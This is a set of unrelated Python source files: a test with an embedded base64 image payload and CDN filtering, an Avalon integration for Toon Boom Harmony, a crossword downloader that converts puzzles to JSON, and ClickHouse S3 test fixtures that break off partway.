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'},
timeout=60,
)
print(rsp.content)
print(f"响应时间{time.time()-starttime}m")
except:
pass
def testCdn(self):
"""
测试cdn筛选
:return:
"""
CDN = CDNProxy()
all_cdn = CDN.open_cdn_file()
s = select()
all_cdn = self.open_cdn_file()
cdns = [all_cdn[i:i + 50] for i in range(0, len(all_cdn), 50)]
for i in cdns:
t = threading.Thread(target=s.cdn_req, args=(i,))
t.start()
if __name__ == '__main__':
unittest.main()
|
lib.py
|
import subprocess
import threading
import os
import random
import zipfile
import sys
import importlib
import queue
import shutil
import logging
import contextlib
import json
import signal
import time
from .server import Server
from ..vendor.Qt import QtWidgets
from ..tools import workfiles
from ..toonboom import setup_startup_scripts
self = sys.modules[__name__]
self.server = None
self.pid = None
self.application_path = None
self.callback_queue = None
self.workfile_path = None
self.port = None
# Setup logging.
self.log = logging.getLogger(__name__)
self.log.setLevel(logging.DEBUG)
def execute_in_main_thread(func_to_call_from_main_thread):
self.callback_queue.put(func_to_call_from_main_thread)
def main_thread_listen():
callback = self.callback_queue.get()
callback()
def launch(application_path):
"""Setup for Harmony launch.
Launches Harmony and the server, then starts listening on the main thread
for callbacks from the server. This is to have Qt applications run in the
main thread.
"""
from avalon import api, harmony
api.install(harmony)
self.port = random.randrange(5000, 6000)
os.environ["AVALON_HARMONY_PORT"] = str(self.port)
self.application_path = application_path
# Launch Harmony.
setup_startup_scripts()
if os.environ.get("AVALON_HARMONY_WORKFILES_ON_LAUNCH", False):
workfiles.show(save=False)
# No launch through Workfiles happened.
if not self.workfile_path:
zip_file = os.path.join(os.path.dirname(__file__), "temp.zip")
launch_zip_file(zip_file)
self.callback_queue = queue.Queue()
while True:
main_thread_listen()
def get_local_harmony_path(filepath):
"""From the provided path get the equivalent local Harmony path."""
basename = os.path.splitext(os.path.basename(filepath))[0]
harmony_path = os.path.join(os.path.expanduser("~"), ".avalon", "harmony")
return os.path.join(harmony_path, basename)
def launch_zip_file(filepath):
"""Launch a Harmony application instance with the provided zip file."""
print("Localizing {}".format(filepath))
temp_path = get_local_harmony_path(filepath)
scene_path = os.path.join(
temp_path, os.path.basename(temp_path) + ".xstage"
)
unzip = False
if os.path.exists(scene_path):
# Check remote scene is newer than local.
if os.path.getmtime(scene_path) < os.path.getmtime(filepath):
shutil.rmtree(temp_path)
unzip = True
else:
unzip = True
if unzip:
with zipfile.ZipFile(filepath, "r") as zip_ref:
zip_ref.extractall(temp_path)
# Close existing scene.
if self.pid:
os.kill(self.pid, signal.SIGTERM)
# Stop server.
if self.server:
self.server.stop()
# Launch Avalon server.
self.server = Server(self.port)
thread = threading.Thread(target=self.server.start)
thread.daemon = True
thread.start()
# Save workfile path for later.
self.workfile_path = filepath
print("Launching {}".format(scene_path))
process = subprocess.Popen([self.application_path, scene_path])
self.pid = process.pid
def on_file_changed(path, threaded=True):
"""Threaded zipping and move of the project directory.
This method is called when the `.xstage` file is changed.
"""
self.log.debug("File changed: " + path)
if self.workfile_path is None:
return
if threaded:
thread = threading.Thread(
target=zip_and_move,
args=(os.path.dirname(path), self.workfile_path)
)
thread.start()
else:
zip_and_move(os.path.dirname(path), self.workfile_path)
def zip_and_move(source, destination):
"""Zip a directory and move to `destination`
Args:
- source (str): Directory to zip and move to destination.
- destination (str): Destination file path to zip file.
"""
os.chdir(os.path.dirname(source))
shutil.make_archive(os.path.basename(source), "zip", source)
shutil.move(os.path.basename(source) + ".zip", destination)
self.log.debug("Saved \"{}\" to \"{}\"".format(source, destination))
def show(module_name):
"""Call show on "module_name".
This allows to make a QApplication ahead of time and always "exec_" to
prevent crashing.
Args:
module_name (str): Name of module to call "show" on.
"""
# Requests often get doubled up when showing tools, so we wait a second for
# requests to be received properly.
time.sleep(1)
# Need to have an existing QApplication.
app = QtWidgets.QApplication.instance()
if not app:
app = QtWidgets.QApplication(sys.argv)
# Import and show tool.
module = importlib.import_module(module_name)
if "loader" in module_name:
module.show(use_context=True)
else:
module.show()
# QApplication needs to always execute.
if "publish" in module_name:
return
app.exec_()
def get_scene_data():
func = """function func(args)
{
var metadata = scene.metadata("avalon");
if (metadata){
return JSON.parse(metadata.value);
}else {
return {};
}
}
func
"""
try:
return self.send({"function": func})["result"]
except json.decoder.JSONDecodeError:
# Means no sceen metadata has been made before.
return {}
except KeyError:
# Means no existing scene metadata has been made.
return {}
def set_scene_data(data):
# Write scene data.
func = """function func(args)
{
scene.setMetadata({
"name" : "avalon",
"type" : "string",
"creator" : "Avalon",
"version" : "1.0",
"value" : JSON.stringify(args[0])
});
}
func
"""
self.send({"function": func, "args": [data]})
def read(node_id):
"""Read object metadata in to a dictionary.
Args:
node_id (str): Path to node or id of object.
Returns:
dict
"""
scene_data = get_scene_data()
if node_id in get_scene_data():
return scene_data[node_id]
return {}
def remove(node_id):
data = get_scene_data()
del data[node_id]
set_scene_data(data)
def imprint(node_id, data, remove=False):
"""Write `data` to the `node` as json.
Arguments:
node_id (str): Path to node or id of object.
data (dict): Dictionary of key/value pairs.
remove (bool): Removes the data from the scene.
Example:
>>> from avalon.harmony import lib
>>> node = "Top/Display"
>>> data = {"str": "someting", "int": 1, "float": 0.32, "bool": True}
>>> lib.imprint(layer, data)
"""
scene_data = get_scene_data()
if remove and (node_id in scene_data):
scene_data.pop(node_id, None)
else:
if node_id in scene_data:
scene_data[node_id].update(data)
else:
scene_data[node_id] = data
set_scene_data(scene_data)
@contextlib.contextmanager
def maintained_selection():
"""Maintain selection during context."""
func = """function get_selection_nodes()
{
var selection_length = selection.numberOfNodesSelected();
var selected_nodes = [];
for (var i = 0 ; i < selection_length; i++)
{
selected_nodes.push(selection.selectedNode(i));
}
return selected_nodes
}
get_selection_nodes
"""
selected_nodes = self.send({"function": func})["result"]
func = """function select_nodes(node_paths)
{
selection.clearSelection();
for (var i = 0 ; i < node_paths.length; i++)
{
selection.addNodeToSelection(node_paths[i]);
}
}
select_nodes
"""
try:
yield selected_nodes
finally:
selected_nodes = self.send(
{"function": func, "args": selected_nodes}
)
def send(request):
"""Public method for sending requests to Harmony."""
return self.server.send(request)
@contextlib.contextmanager
def maintained_nodes_state(nodes):
"""Maintain nodes states during context."""
# Collect current state.
states = []
for node in nodes:
states.append(
self.send(
{"function": "node.getEnable", "args": [node]}
)["result"]
)
# Disable all nodes.
func = """function func(nodes)
{
for (var i = 0 ; i < nodes.length; i++)
{
node.setEnable(nodes[i], false);
}
}
func
"""
self.send({"function": func, "args": [nodes]})
# Restore state after yield.
func = """function func(args)
{
var nodes = args[0];
var states = args[1];
for (var i = 0 ; i < nodes.length; i++)
{
node.setEnable(nodes[i], states[i]);
}
}
func
"""
try:
yield
finally:
self.send({"function": func, "args": [nodes, states]})
def save_scene():
"""Saves the Harmony scene safely.
The built-in (to Avalon) background zip and moving of the Harmony scene
folder, interfers with server/client communication by sending two requests
at the same time. This only happens when sending "scene.saveAll()". This
method prevents this double request and safely saves the scene.
"""
# Need to turn off the backgound watcher else the communication with
# the server gets spammed with two requests at the same time.
func = """function func()
{
var app = QCoreApplication.instance();
app.avalon_on_file_changed = false;
scene.saveAll();
return (
scene.currentProjectPath() + "/" +
scene.currentVersionName() + ".xstage"
);
}
func
"""
scene_path = self.send({"function": func})["result"]
# Manually update the remote file.
self.on_file_changed(scene_path, threaded=False)
# Re-enable the background watcher.
func = """function func()
{
var app = QCoreApplication.instance();
app.avalon_on_file_changed = true;
}
func
"""
self.send({"function": func})
def save_scene_as(filepath):
"""Save Harmony scene as `filepath`."""
scene_dir = os.path.dirname(filepath)
destination = os.path.join(
os.path.dirname(self.workfile_path),
os.path.splitext(os.path.basename(filepath))[0] + ".zip"
)
if os.path.exists(scene_dir):
shutil.rmtree(scene_dir)
send(
{"function": "scene.saveAs", "args": [scene_dir]}
)["result"]
zip_and_move(scene_dir, destination)
self.workfile_path = destination
func = """function add_path(path)
{
var app = QCoreApplication.instance();
app.watcher.addPath(path);
}
add_path
"""
send(
{"function": func, "args": [filepath]}
)
def find_node_by_name(name, node_type):
nodes = send(
{"function": "node.getNodes", "args": [[node_type]]}
)["result"]
for node in nodes:
node_name = node.split("/")[-1]
if name == node_name:
return node
return None
|
manager.py
|
import os
import puzpy
import datetime
import json
import xml.etree.ElementTree as xml_tree
import threading
import time
import db
import downloaders
class Manager(object):
database = None
base_path = None
crossword_path = None
stopping = False
download_thread = None
def __init__(self, base_path, db_file):
self.database = db.DB(db_file)
self.base_path = base_path
self.crossword_path = os.path.join(self.base_path, "crosswords")
self.download_thread = threading.Thread(target=self.download_loop)
self.download_thread.start()
return
def __del__(self):
self.stopping = True
self.database.__del__()
def download_loop(self):
delay = 60*60
i = delay
while True:
while delay > i:
if self.stopping:
return
time.sleep(1)
i += 1
i = 0
self.download_puzzles()
def download_puzzles(self):
dl = [
(downloaders.LATimesDownloader, "{0}-{1}-{2}.LA Times", 'xml', self.read_xml)
]
titles = map(lambda p: p["Title"], self.database.select_puzzles())
if not os.path.exists(self.crossword_path):
os.makedirs(self.crossword_path)
now = datetime.datetime.today()
for i in range(0, 30):
current = now - datetime.timedelta(days=i)
for downloader, mask, extension, reader in dl:
if self.stopping:
return
title = mask.format(current.year, current.month, current.day)
if title not in titles:
filename = os.path.join(self.crossword_path, title + "." + extension)
try:
if not os.path.exists(filename):
data = downloader.download(current)
time.sleep(1)
with open(filename, 'w') as puzzle:
puzzle.write(data)
js = reader(filename)
self.database.insert_puzzle(title, db.get_timestamp(current), json.dumps(js))
except Exception as e:
print "Failed to process " + filename
print e
return
def read_puz(self, path):
return self.puz_to_json(puzpy.read(path))
def read_xml(self, path):
xml = None
with open(path, 'r') as obj:
xml = obj.read()
xml = xml.replace( "xmlns=", "blank=")
return self.xml_to_json(xml_tree.fromstring(xml))
def xml_to_json(self, puzzle):
js = dict()
crossword = puzzle.find(".//crossword")
js["title"] = puzzle.find(".//title").text
grid = crossword.find("./grid")
js["height"] = int(grid.attrib["height"])
js["width"] = int(grid.attrib["width"])
js["rows"] = [[]]
js["clues"] = [{},{}]
for y in range(1, js["height"]+1):
row = []
for x in range(1, js["width"]+1):
cell = grid.find("./cell[@x='{0}'][@y='{1}']".format(x,y))
cell = {
"clue" : int(cell.attrib["number"]) if "number" in cell.attrib.keys() else None,
"black" : cell.attrib["type"] == "block" if "type" in cell.attrib.keys() else None
}
row.append(cell)
js["rows"].append(row)
words = crossword.findall("./word")
for word in words:
clue = crossword.find(".//clue[@word='{0}']".format(word.attrib["id"]))
number = clue.attrib["number"]
clue_index = 0 if "-" in word.attrib["x"] else 1
js["clues"][clue_index][number] = clue.text
return js
def puz_to_json(self, puzzle):
js = dict()
js["title"] = puzzle.title
js["height"] = puzzle.height
js["width"] = puzzle.width
js["rows"] = [[]]
js["clues"] = [{},{}]
x, y, c, i = 0, 0, 1, 0
for char in list(puzzle.fill):
if x >= puzzle.width:
x = 0
y += 1
js["rows"].append([])
black = char == '.'
horz_clue = not black and (x == 0 or js["rows"][y][x-1]["black"])
vert_clue = not black and (y == 0 or js["rows"][y-1][x]["black"])
clue = c if horz_clue or vert_clue else None
if clue is not None: c += 1
js["rows"][y].append({
"black" : black,
"clue" : clue
})
if horz_clue:
js["clues"][0][clue] = puzzle.clues[i]
i += 1
if vert_clue:
js["clues"][1][clue] = puzzle.clues[i]
i += 1
x += 1
return js
|
test.py
|
import logging
import random
import string
import time
import threading
import os
import pytest
from helpers.cluster import ClickHouseCluster
logging.getLogger().setLevel(logging.INFO)
logging.getLogger().addHandler(logging.StreamHandler())
# By default the exceptions that was throwed in threads will be ignored
# (they will not mark the test as failed, only printed to stderr).
#
# Wrap thrading.Thread and re-throw exception on join()
class SafeThread(threading.Thread):
def __init__(self, target):
super().__init__()
self.target = target
self.exception = None
def run(self):
try:
self.target()
except Exception as e: # pylint: disable=broad-except
self.exception = e
def join(self, timeout=None):
super().join(timeout)
if self.exception:
raise self.exception
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
CONFIG_PATH = os.path.join(SCRIPT_DIR, './_instances/node/configs/config.d/storage_conf.xml')
def replace_config(old, new):
config = open(CONFIG_PATH, 'r')
config_lines = config.readlines()
config.close()
config_lines = [line.replace(old, new) for line in config_lines]
config = open(CONFIG_PATH, 'w')
config.writelines(config_lines)
config.close()
@pytest.fixture(scope="module")
def cluster():
try:
cluster = ClickHouseCluster(__file__)
cluster.add_instance("node", main_configs=["configs/config.d/storage_conf.xml",
"configs/config.d/bg_processing_pool_conf.xml",
"configs/config.d/log_conf.xml"], with_minio=True)
logging.info("Starting cluster...")
cluster.start()
logging.info("Cluster started")
yield cluster
finally:
cluster.shutdown()
FILES_OVERHEAD = 1
FILES_OVERHEAD_PER_COLUMN = 2 # Data and mark files
FILES_OVERHEAD_PER_PART_WIDE = FILES_OVERHEAD_PER_COLUMN * 3 + 2 + 6 + 1
FILES_OVERHEAD_PER_PART_COMPACT = 10 + 1
def random_string(length):
letters = string.ascii_letters
return ''.join(random.choice(letters) for i in range(length))
def generate_values(date_str, count, sign=1):
data = [[date_str, sign * (i + 1), random_string(10)] for i in range(count)]
data.sort(key=lambda tup: tup[1])
return ",".join(["('{}',{},'{}')".format(x, y, z) for x, y, z in data])
def create_table(cluster, table_name, additional_settings=None):
node = cluster.instances["node"]
create_table_statement = """
CREATE TABLE {} (
dt Date,
id Int64,
data String,
INDEX min_max (id) TYPE minmax GRANULARITY 3
) ENGINE=MergeTree()
PARTITION BY dt
ORDER BY (dt, id)
SETTINGS
storage_policy='s3',
old_parts_lifetime=0,
index_granularity=512
""".format(table_name)
if additional_settings:
create_table_statement += ","
create_table_statement += additional_settings
node.query(create_table_statement)
def wait_for_delete_s3_objects(cluster, expected, timeout=30):
minio = cluster.minio_client
while timeout > 0:
if len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == expected:
return
timeout -= 1
time.sleep(1)
assert(len(list(minio.list_objects(cluster.minio_bucket, 'data/'))) == expected)
@pytest.fixture(autouse=True)
def drop_table(cluster):
yield
